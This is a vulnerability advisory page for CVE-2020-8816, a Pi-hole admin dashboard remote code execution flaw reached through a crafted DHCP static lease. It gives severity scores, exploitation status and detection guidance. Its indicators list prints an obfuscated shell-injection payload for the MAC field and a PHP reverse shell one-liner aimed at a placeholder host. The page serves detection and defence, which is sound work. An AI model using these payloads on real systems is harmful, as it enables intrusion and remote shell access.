cbcvebase.
CVE-2020-8816
published 2020-05-29

CVE-2020-8816: Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.

PriorityP185high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
77.85%
99.5th percentile
Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.

Affected

1 ranges
VendorProductVersion rangeFixed in
pi-holepi-hole<= 4.3.2

Detection & IOCsextracted from sources · hover to see the quote

url/admin/index.php?login
url/admin/settings.php?tab=piholedhcp
commandaaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("<PAYLOAD>"));'&&
commandphp -r '$sock=fsockopen("LHOST", LPORT);exec("/bin/sh -i &3 2>&3");'
path/opt/pihole
  • Monitor POST requests to /admin/settings.php?tab=piholedhcp containing shell metacharacters (&&, $, %) in the AddMAC parameter field, which is the injection point for this exploit.
  • Detect the hardcoded static PHPSESSID cookie value 'cabesha' in HTTP requests to Pi-hole admin endpoints, which is a strong indicator of this specific exploit script being used.
  • Alert on MAC address field values in DHCP static lease submissions that contain '&&' or shell variable expansion patterns (e.g. ${PATH#...}) rather than valid MAC address format (xx:xx:xx:xx:xx:xx).
  • DHCP server does not need to be running for exploitation to succeed; do not rely on DHCP service state as an indicator of safety.
  • ·Exploitation requires /opt/pihole to be first in $PATH. Hardening the PATH environment variable for the web server process can mitigate or complicate exploitation.
  • ·The vulnerability is exploitable by authenticated, privileged dashboard users only — unauthenticated access is not sufficient. Restricting admin dashboard access reduces attack surface.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.1CRITICALCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck7.2HIGH
cisa7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.